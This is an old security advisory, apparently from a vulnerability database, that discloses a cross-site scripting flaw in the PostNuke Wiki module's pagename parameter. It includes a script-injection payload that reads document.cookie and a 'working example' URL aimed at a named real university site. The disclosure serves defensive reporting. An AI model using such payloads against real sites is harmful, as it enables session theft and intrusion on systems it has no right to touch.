Wiki module postnuke Cross Site Scripting Vulnerability

2002-07-18T00:00:00
ID SECURITYVULNS:DOC:3229
Type securityvulns
Reporter Securityvulns
Modified 2002-07-18T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Class : input Validation Error

Risk : Due to the simplicity of the attack and the number of sites that run phpwiki, the risk is classified as Medium to High.


This wiki is running as a PostNuke module.


Exploit: pagename=|script|alert(document.cookie)|/script|

Change | x <>

Working Example :

http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|

-

programmer of wiki module and admin of postnuke-espanol.org receives a copy this report.


Salu2

Pistone


Http://www.gauchohack.com.ar Http://www.hackindex.org

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org

iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz PlAN98+qigqp8S9pkkfFRm4= =c2FT -----END PGP SIGNATURE-----